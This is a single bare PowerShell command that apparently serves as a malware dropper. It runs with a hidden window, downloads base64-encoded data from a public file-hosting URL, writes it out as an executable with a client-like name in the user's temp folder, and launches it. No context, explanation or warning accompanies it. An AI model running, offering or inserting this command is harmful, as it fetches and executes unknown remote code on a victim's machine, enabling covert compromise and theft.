powershell -w 1 -c "$b=irm https://files.catbox.moe/5z57x9.txt; $p=$env:temp+'\aetlient.exe'; [IO.File]::WriteAllBytes($p, [Convert]::FromBase64String($b)); start $p"